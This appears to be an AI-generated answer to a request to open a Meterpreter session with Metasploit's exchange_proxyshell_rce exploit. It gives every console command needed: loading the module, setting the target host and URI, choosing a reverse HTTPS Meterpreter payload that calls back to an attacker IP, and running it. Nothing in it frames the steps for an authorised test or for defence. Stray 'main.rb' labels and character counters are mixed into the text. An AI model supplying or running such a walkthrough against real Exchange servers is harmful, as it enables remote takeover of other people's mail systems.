open a new meterpreter session using the exchange_proxyshell_rce exploit in ruby

To open a new meterpreter session using the exchange_proxyshell_rce exploit in ruby, follow these steps:

1. First, setup the Metasploit framework on your system and run it.

2. Next, load the exploit/multi/http/exchange_proxyshell_rce module by running the following command in the Metasploit console:

   main.rb
   msf6 > use exploit/multi/http/exchange_proxyshell_rce
   54 chars
   2 lines

3. Set the values of RHOST, RPORT and TARGETURI options as per the target environment. For example:

   main.rb
   msf6 exploit(multi/http/exchange_proxyshell_rce) > set RHOST <target_ip>
   msf6 exploit(multi/http/exchange_proxyshell_rce) > set RPORT <target_port>
   msf6 exploit(multi/http/exchange_proxyshell_rce) > set TARGETURI /owa/auth/x.js
   228 chars
   4 lines

4. Set the PAYLOAD option to windows/meterpreter/reverse_https, as this payload will create a new meterpreter session for us:

   main.rb
   msf6 exploit(multi/http/exchange_proxyshell_rce) > set PAYLOAD windows/meterpreter/reverse_https
   97 chars
   2 lines

5. Configure the payload options such as LHOST and LPORT to connect back to your attacker machine:

   main.rb
   msf6 exploit(multi/http/exchange_proxyshell_rce) > set LHOST <attacker_ip>
   msf6 exploit(multi/http/exchange_proxyshell_rce) > set LPORT <attacker_port>
   152 chars
   3 lines

6. Finally, run the exploit using the exploit command:

   main.rb
   msf6 exploit(multi/http/exchange_proxyshell_rce) > exploit
   59 chars
   2 lines

If the exploit is successful, you should see a new meterpreter session opened in your Metasploit console.